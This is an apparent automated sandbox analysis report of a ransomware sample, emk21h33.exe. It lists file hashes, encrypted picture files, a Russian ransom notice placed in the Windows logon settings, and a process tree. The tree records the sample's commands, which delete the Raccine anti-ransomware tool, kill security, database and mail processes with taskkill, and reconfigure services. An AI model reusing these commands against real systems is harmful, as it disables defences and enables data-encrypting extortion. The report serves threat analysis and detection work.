Analysis
-
max time kernel
107s -
max time network
107s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
24-11-2021 09:36
Static task
static1
Behavioral task
behavioral1
Sample
emk21h33.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
emk21h33.exe
Resource
win10-en-20211104
General
-
Target
emk21h33.exe
-
Size
385KB
-
MD5
54e8989f3595120a430b8d31ca87c0cc
-
SHA1
30609e95e4396e7c409b21e0d96c185736cc01d2
-
SHA256
74a717027b6212236662bf641c473b8f8cd65486898b02940357bb9b3035f38a
-
SHA512
56d102a6723e79e0fd4bf5756cf5fe01c36d62a9f1c0575750c288ab9b6de119ce6675a5156c80f4ed3274962981a14095ced7c9d213f9e9216b4a655ab66206
Malware Config
Signatures
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.
description flow ioc HTTP URL 11 http://live.sysinternals.com/PsExec.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 14 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\CheckpointClear.tiff emk21h33.exe File opened for modification C:\Users\Admin\Pictures\InvokeDismount.crw.xot5ik emk21h33.exe File opened for modification C:\Users\Admin\Pictures\PingMount.tiff emk21h33.exe File opened for modification C:\Users\Admin\Pictures\PingMount.tiff.xot5ik emk21h33.exe File renamed C:\Users\Admin\Pictures\CheckpointClear.tiff => C:\Users\Admin\Pictures\CheckpointClear.tiff.xot5ik emk21h33.exe File opened for modification C:\Users\Admin\Pictures\CheckpointClear.tiff.xot5ik emk21h33.exe File renamed C:\Users\Admin\Pictures\SendSkip.crw => C:\Users\Admin\Pictures\SendSkip.crw.xot5ik emk21h33.exe File renamed C:\Users\Admin\Pictures\WaitSkip.tif => C:\Users\Admin\Pictures\WaitSkip.tif.xot5ik emk21h33.exe File renamed C:\Users\Admin\Pictures\PingMount.tiff => C:\Users\Admin\Pictures\PingMount.tiff.xot5ik emk21h33.exe File renamed C:\Users\Admin\Pictures\SendInstall.png => C:\Users\Admin\Pictures\SendInstall.png.xot5ik emk21h33.exe File opened for modification C:\Users\Admin\Pictures\SendSkip.crw.xot5ik emk21h33.exe File renamed C:\Users\Admin\Pictures\InvokeDismount.crw => C:\Users\Admin\Pictures\InvokeDismount.crw.xot5ik emk21h33.exe File opened for modification C:\Users\Admin\Pictures\SendInstall.png.xot5ik emk21h33.exe File opened for modification C:\Users\Admin\Pictures\WaitSkip.tif.xot5ik emk21h33.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: emk21h33.exe File opened (read-only) \??\R: emk21h33.exe File opened (read-only) \??\Y: emk21h33.exe File opened (read-only) \??\I: emk21h33.exe File opened (read-only) \??\O: emk21h33.exe File opened (read-only) \??\P: emk21h33.exe File opened (read-only) \??\S: emk21h33.exe File opened (read-only) \??\L: emk21h33.exe File opened (read-only) \??\V: emk21h33.exe File opened (read-only) \??\W: emk21h33.exe File opened (read-only) \??\E: emk21h33.exe File opened (read-only) \??\H: emk21h33.exe File opened (read-only) \??\U: emk21h33.exe File opened (read-only) \??\A: emk21h33.exe File opened (read-only) \??\F: emk21h33.exe File opened (read-only) \??\X: emk21h33.exe File opened (read-only) \??\M: emk21h33.exe File opened (read-only) \??\T: emk21h33.exe File opened (read-only) \??\G: emk21h33.exe File opened (read-only) \??\J: emk21h33.exe File opened (read-only) \??\K: emk21h33.exe File opened (read-only) \??\Z: emk21h33.exe File opened (read-only) \??\B: emk21h33.exe File opened (read-only) \??\N: emk21h33.exe -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание Внимание Внимание!!!" emk21h33.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Добрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!" emk21h33.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 58 IoCs
pid Process 940 taskkill.exe 1532 taskkill.exe 672 taskkill.exe 1732 taskkill.exe 1980 taskkill.exe 1696 taskkill.exe 1736 taskkill.exe 1900 taskkill.exe 340 taskkill.exe 1980 taskkill.exe 1884 taskkill.exe 1500 taskkill.exe 1500 taskkill.exe 1540 taskkill.exe 960 taskkill.exe 1992 taskkill.exe 552 taskkill.exe 1000 taskkill.exe 1552 taskkill.exe 888 taskkill.exe 764 taskkill.exe 1264 taskkill.exe 1724 taskkill.exe 968 taskkill.exe 1800 taskkill.exe 1696 taskkill.exe 900 taskkill.exe 1144 taskkill.exe 1100 taskkill.exe 616 taskkill.exe 608 taskkill.exe 1952 taskkill.exe 1968 taskkill.exe 624 taskkill.exe 928 taskkill.exe 1944 taskkill.exe 1928 taskkill.exe 684 taskkill.exe 808 taskkill.exe 1936 taskkill.exe 1532 taskkill.exe 1124 taskkill.exe 1752 taskkill.exe 1972 taskkill.exe 1124 taskkill.exe 456 taskkill.exe 1936 taskkill.exe 964 taskkill.exe 1720 taskkill.exe 896 taskkill.exe 940 taskkill.exe 588 taskkill.exe 1112 taskkill.exe 1900 taskkill.exe 864 taskkill.exe 528 taskkill.exe 1064 taskkill.exe 920 taskkill.exe -
Modifies registry class 31 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}" splwow64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewVersion = "0" splwow64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\Mode = "4" splwow64.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 splwow64.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU splwow64.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9} splwow64.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_Classes\Local Settings splwow64.exe Set value (str) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}" splwow64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\IconSize = "16" splwow64.exe Set value (data) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\Sort = 000000000000000000000000000000000200000030f125b7ef471a10a5f102608c9eebac0a0000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff splwow64.exe Set value (data) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff splwow64.exe Set value (data) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots splwow64.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 splwow64.exe Set value (data) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff splwow64.exe Set value (data) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000 splwow64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" splwow64.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg splwow64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\FFlags = "1092616257" splwow64.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell splwow64.exe Set value (data) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 splwow64.exe Set value (data) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff splwow64.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags splwow64.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC} splwow64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\FFlags = "1" splwow64.exe Set value (data) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000 splwow64.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg splwow64.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 splwow64.exe Set value (data) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 splwow64.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders splwow64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\LogicalViewMode = "1" splwow64.exe Set value (data) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff splwow64.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 744 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1852 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe 1624 emk21h33.exe -
Suspicious use of AdjustPrivilegeToken 58 IoCs
description pid Process Token: SeDebugPrivilege 1624 emk21h33.exe Token: SeDebugPrivilege 1624 emk21h33.exe Token: SeDebugPrivilege 1264 taskkill.exe Token: SeDebugPrivilege 900 taskkill.exe Token: SeDebugPrivilege 1500 taskkill.exe Token: SeDebugPrivilege 940 taskkill.exe Token: SeDebugPrivilege 1144 taskkill.exe Token: SeDebugPrivilege 1980 taskkill.exe Token: SeDebugPrivilege 1100 taskkill.exe Token: SeDebugPrivilege 1112 taskkill.exe Token: SeDebugPrivilege 1724 taskkill.exe Token: SeDebugPrivilege 1992 taskkill.exe Token: SeDebugPrivilege 1936 taskkill.exe Token: SeDebugPrivilege 864 taskkill.exe Token: SeDebugPrivilege 1696 taskkill.exe Token: SeDebugPrivilege 1532 taskkill.exe Token: SeDebugPrivilege 968 taskkill.exe Token: SeDebugPrivilege 1124 taskkill.exe Token: SeDebugPrivilege 1968 taskkill.exe Token: SeDebugPrivilege 1752 taskkill.exe Token: SeDebugPrivilege 896 conhost.exe Token: SeDebugPrivilege 764 taskkill.exe Token: SeDebugPrivilege 1884 taskkill.exe Token: SeDebugPrivilege 624 taskkill.exe Token: SeDebugPrivilege 456 taskkill.exe Token: SeDebugPrivilege 552 taskkill.exe Token: SeDebugPrivilege 928 taskkill.exe Token: SeDebugPrivilege 964 taskkill.exe Token: SeDebugPrivilege 1540 taskkill.exe Token: SeDebugPrivilege 1532 taskkill.exe Token: SeDebugPrivilege 1124 taskkill.exe Token: SeDebugPrivilege 1736 taskkill.exe Token: SeDebugPrivilege 960 taskkill.exe Token: SeDebugPrivilege 528 taskkill.exe Token: SeDebugPrivilege 1720 taskkill.exe Token: SeDebugPrivilege 1552 taskkill.exe Token: SeDebugPrivilege 1064 taskkill.exe Token: SeDebugPrivilege 1500 taskkill.exe Token: SeDebugPrivilege 1936 taskkill.exe Token: SeDebugPrivilege 1000 taskkill.exe Token: SeDebugPrivilege 1944 taskkill.exe Token: SeDebugPrivilege 616 taskkill.exe Token: SeDebugPrivilege 1800 taskkill.exe Token: SeDebugPrivilege 608 taskkill.exe Token: SeDebugPrivilege 920 taskkill.exe Token: SeDebugPrivilege 340 taskkill.exe Token: SeDebugPrivilege 1980 taskkill.exe Token: SeDebugPrivilege 888 taskkill.exe Token: SeDebugPrivilege 1952 taskkill.exe Token: SeDebugPrivilege 672 taskkill.exe Token: SeDebugPrivilege 1732 taskkill.exe Token: SeDebugPrivilege 940 taskkill.exe Token: SeDebugPrivilege 808 taskkill.exe Token: SeDebugPrivilege 1696 taskkill.exe Token: SeDebugPrivilege 588 taskkill.exe Token: SeDebugPrivilege 1928 taskkill.exe Token: SeDebugPrivilege 684 taskkill.exe Token: SeDebugPrivilege 1576 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1624 emk21h33.exe 1624 emk21h33.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1624 emk21h33.exe 1624 emk21h33.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1072 splwow64.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1624 wrote to memory of 1264 1624 emk21h33.exe 29 PID 1624 wrote to memory of 1264 1624 emk21h33.exe 29 PID 1624 wrote to memory of 1264 1624 emk21h33.exe 29 PID 1624 wrote to memory of 1264 1624 emk21h33.exe 29 PID 1624 wrote to memory of 340 1624 emk21h33.exe 31 PID 1624 wrote to memory of 340 1624 emk21h33.exe 31 PID 1624 wrote to memory of 340 1624 emk21h33.exe 31 PID 1624 wrote to memory of 340 1624 emk21h33.exe 31 PID 1624 wrote to memory of 744 1624 emk21h33.exe 33 PID 1624 wrote to memory of 744 1624 emk21h33.exe 33 PID 1624 wrote to memory of 744 1624 emk21h33.exe 33 PID 1624 wrote to memory of 744 1624 emk21h33.exe 33 PID 1624 wrote to memory of 956 1624 emk21h33.exe 35 PID 1624 wrote to memory of 956 1624 emk21h33.exe 35 PID 1624 wrote to memory of 956 1624 emk21h33.exe 35 PID 1624 wrote to memory of 956 1624 emk21h33.exe 35 PID 1624 wrote to memory of 1152 1624 emk21h33.exe 37 PID 1624 wrote to memory of 1152 1624 emk21h33.exe 37 PID 1624 wrote to memory of 1152 1624 emk21h33.exe 37 PID 1624 wrote to memory of 1152 1624 emk21h33.exe 37 PID 1624 wrote to memory of 1084 1624 emk21h33.exe 38 PID 1624 wrote to memory of 1084 1624 emk21h33.exe 38 PID 1624 wrote to memory of 1084 1624 emk21h33.exe 38 PID 1624 wrote to memory of 1084 1624 emk21h33.exe 38 PID 1624 wrote to memory of 1000 1624 emk21h33.exe 41 PID 1624 wrote to memory of 1000 1624 emk21h33.exe 41 PID 1624 wrote to memory of 1000 1624 emk21h33.exe 41 PID 1624 wrote to memory of 1000 1624 emk21h33.exe 41 PID 1624 wrote to memory of 1788 1624 emk21h33.exe 43 PID 1624 wrote to memory of 1788 1624 emk21h33.exe 43 PID 1624 wrote to memory of 1788 1624 emk21h33.exe 43 PID 1624 wrote to memory of 1788 1624 emk21h33.exe 43 PID 1624 wrote to memory of 920 1624 emk21h33.exe 45 PID 1624 wrote to memory of 920 1624 emk21h33.exe 45 PID 1624 wrote to memory of 920 1624 emk21h33.exe 45 PID 1624 wrote to memory of 920 1624 emk21h33.exe 45 PID 1624 wrote to memory of 1036 1624 emk21h33.exe 47 PID 1624 wrote to memory of 1036 1624 emk21h33.exe 47 PID 1624 wrote to memory of 1036 1624 emk21h33.exe 47 PID 1624 wrote to memory of 1036 1624 emk21h33.exe 47 PID 1624 wrote to memory of 1600 1624 emk21h33.exe 48 PID 1624 wrote to memory of 1600 1624 emk21h33.exe 48 PID 1624 wrote to memory of 1600 1624 emk21h33.exe 48 PID 1624 wrote to memory of 1600 1624 emk21h33.exe 48 PID 1624 wrote to memory of 1308 1624 emk21h33.exe 50 PID 1624 wrote to memory of 1308 1624 emk21h33.exe 50 PID 1624 wrote to memory of 1308 1624 emk21h33.exe 50 PID 1624 wrote to memory of 1308 1624 emk21h33.exe 50 PID 1624 wrote to memory of 900 1624 emk21h33.exe 53 PID 1624 wrote to memory of 900 1624 emk21h33.exe 53 PID 1624 wrote to memory of 900 1624 emk21h33.exe 53 PID 1624 wrote to memory of 900 1624 emk21h33.exe 53 PID 1624 wrote to memory of 1500 1624 emk21h33.exe 54 PID 1624 wrote to memory of 1500 1624 emk21h33.exe 54 PID 1624 wrote to memory of 1500 1624 emk21h33.exe 54 PID 1624 wrote to memory of 1500 1624 emk21h33.exe 54 PID 1624 wrote to memory of 940 1624 emk21h33.exe 56 PID 1624 wrote to memory of 940 1624 emk21h33.exe 56 PID 1624 wrote to memory of 940 1624 emk21h33.exe 56 PID 1624 wrote to memory of 940 1624 emk21h33.exe 56 PID 1624 wrote to memory of 1144 1624 emk21h33.exe 59 PID 1624 wrote to memory of 1144 1624 emk21h33.exe 59 PID 1624 wrote to memory of 1144 1624 emk21h33.exe 59 PID 1624 wrote to memory of 1144 1624 emk21h33.exe 59 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Добрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!" emk21h33.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" emk21h33.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" emk21h33.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание Внимание Внимание!!!" emk21h33.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\emk21h33.exe"C:\Users\Admin\AppData\Local\Temp\emk21h33.exe"1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1624 -
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1264
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:340
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:744
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:956
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:1152
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:1084
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto2⤵PID:1000
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:1788
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:920
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:1036
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto2⤵PID:1600
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:1308
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:900
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:940
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1144
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1112
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
PID:1900
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
PID:1532
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:968
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
PID:1124
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
PID:896
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:764
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1884
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:624
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:456
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:552
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:928
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:1972
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:964
-
-
